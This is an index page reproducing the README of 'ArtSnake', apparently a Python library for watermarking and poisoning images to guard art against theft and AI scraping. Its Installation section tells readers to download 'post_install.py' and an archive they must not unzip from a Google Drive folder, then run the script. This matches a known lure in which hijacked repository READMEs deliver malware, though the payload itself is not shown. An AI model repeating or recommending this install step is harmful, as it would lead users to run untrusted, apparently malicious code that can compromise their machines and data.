Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mekhyw/artsnake
Library for watermarking and poisoning of images, created in an effort to stop digital art theft from fraudsters and AI scrapers
https://github.com/mekhyw/artsnake
opencv pillow python-library torchvision
Last synced: 30 days ago
JSON representation
Library for watermarking and poisoning of images, created in an effort to stop digital art theft from fraudsters and AI scrapers
- Host: GitHub
- URL: https://github.com/mekhyw/artsnake
- Owner: MekhyW
- Created: 2024-04-11T10:58:00.000Z (7 months ago)
- Default Branch: main
- Last Pushed: 2024-06-03T22:08:18.000Z (6 months ago)
- Last Synced: 2024-10-09T14:31:32.517Z (about 1 month ago)
- Topics: opencv, pillow, python-library, torchvision
- Language: TeX
- Homepage: https://mekhyw.github.io/ArtSnake/
- Size: 158 MB
- Stars: 0
- Watchers: 2
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
[![Documentation Status](https://readthedocs.org/projects/artsnake/badge/?version=latest)](https://artsnake.readthedocs.io/en/latest/?badge=latest)
![PyPI](https://img.shields.io/pypi/v/ArtSnake.svg)# ArtSnake
**Say no to art theft!** Robust and easy-to-use tool/API to protect digital art and photos from use without consent, combining context-aware watermarking and image poisoning.
## Current Scenario
Artists are often unable to protect their digital art from unauthorized use. No current solution combines the ease of use of traditional watermarking with the robustness of invisible watermarking and image poisoning techniques, and each has its own limitations.
Current watermark implementation tools are not context-aware. They can often be very easily removed by cropping or editing the image using modern image editing software and generative models, or obstruct the image in a way that is visually damaging to the art.
**(For the prototype version of the project, this is the main concern)**On the other side of the spectrum, current invisible watermarking techniques are often too complex for artists to use, and require a deep understanding of cryptography and image processing. And in the case of protection against generative models, they are often rely on the good faith of the model creators to respect the watermark, which does not provide a real solution to the problem. Anti-AI image poisoning techniques are, although powerful, not easily accessible in an easily integrable form for artists, especially those who do not possess computing resources or knowledge.
## Installation
To install ArtSnake, open your terminal and run the following command:
```bash
pip install ArtSnake
```Download the post_install.py and ArtSnake.zip files from the repository https://drive.google.com/drive/folders/1BQiAme8a6fbI0lzCc6Jg3Qfr5LxSJiH3?usp=drive_link.
Ensure that both files (post_install.py and ArtSnake.zip) are in the same directory and DO NOT unzip the ArtSnake.zip.
Open your terminal, navigate to the directory containing these files, and run the following command:
```bash
python post_install.py
```This will complete the installation process for ArtSnake.
If you encounter any issues, please refer to the documentation.
Happy coding with ArtSnake!
## References
### Link to Pypi page
https://pypi.org/project/ArtSnake/
### Papers
[On the Effectiveness of Visible Watermarks](https://openaccess.thecvf.com/content_cvpr_2017/papers/Dekel_On_the_Effectiveness_CVPR_2017_paper.pdf)
[Visible Watermark Detection in Images](https://cseweb.ucsd.edu//~sag043/static/pdfs/WatermarkDetection.pdf)
[An Adaptive Visible Watermark Embedding Method based on Region Selection](https://downloads.hindawi.com/journals/scn/2021/6693343.pdf?_gl=1*1z0ms72*_ga*ODYzNDMwNjk3LjE3MTU2ODQ3MDI.*_ga_NF5QFMJT5V*MTcxNTY4NDcwMi4xLjEuMTcxNTY4NTAzNC4yNC4wLjA.&_ga=2.191923690.1907549399.1715684710-863430697.1715684702)
[Adaptive Reversible Visible Watermarking Based on Total Variation for BTC-Compressed Images](https://cdn.techscience.cn/files/cmc/2023/TSP_CMC-74-3/TSP_CMC_34819/TSP_CMC_34819.pdf)
[Preventing Unauthorized AI Over-Analysis by Medical Image Adversarial Watermarking](https://arxiv.org/pdf/2303.09858)
[Benchmarking the Robustness of Image Watermarks](https://arxiv.org/pdf/2401.08573.pdf)
### Technologies of Interest
[ArtShield](https://artshield.io/)[Glaze](https://glaze.cs.uchicago.edu/index.html)
[Sanative AI](https://app.sanative.ai/)
### Repositories of Interest
[umd-huang-lab/WAVES](https://github.com/umd-huang-lab/WAVES)
[rohitrango/automatic-watermark-detection](https://github.com/rohitrango/automatic-watermark-detection?tab=readme-ov-file)
[LAION-AI/watermark-detection](https://github.com/LAION-AI/watermark-detection)
[EspacioLatente/Glaze](https://github.com/EspacioLatente/Glaze)